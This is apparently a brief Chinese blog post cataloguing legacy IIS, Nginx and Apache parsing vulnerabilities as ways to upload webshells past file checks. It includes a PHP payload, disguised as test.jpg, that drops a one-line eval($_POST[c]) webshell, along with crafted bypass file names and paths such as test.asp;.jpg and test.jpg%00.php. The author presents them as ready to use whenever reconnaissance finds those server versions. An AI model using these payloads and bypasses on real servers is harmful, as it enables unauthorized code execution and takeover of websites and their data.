现在对上传的文件校验越来越严格了,所以导致webshell难以上传,而后面解析漏洞的出现在配合文件上传,可以成功上传webshell。危害程度很高
现在整理一些网上公布的解析漏洞。不过都是很老的版本,所以前期信息收集很重要,要是遇到这些版本就可以用上了。
1.IIS5.X-IIS6.0版本
1.1 目录包含.asp或者.asa时,目录下任何扩展名的文件都会当做asp执行
例如 目录下c:/test.asp/test.jpg
那么test.jpg也会被当做asp文件执行。
1.2 分号截断
分号后面的不被解析,例如 test.asp;.jpg 这个文件上传后,当做test.asp执行
2.IIS7.0|IIS7.5|Nginx<8.03畸形解析漏洞
在开启Fast-CGI时上传内容为
<?php fputs(fopen('webshell.php','w'),'<?php eval($_POST[c]) ?>'); ?>
文件名为test.jpg,访问test.jpg/.php会生成一句话webshell.php
3.Nginx<8.03 空字节代码执行
访问时test.jpg%00.php 会把这个文件当做PHP执行
4.apache解析漏洞
apache解析由右向左执行,但是有个问题,apache不认识的后缀不解析,一直到认识的后缀
例如:test.php.dsdsd.dfsdsd
会当做test.php执行
我本地测试了一下发现这个漏洞只有低版本的Apache才有效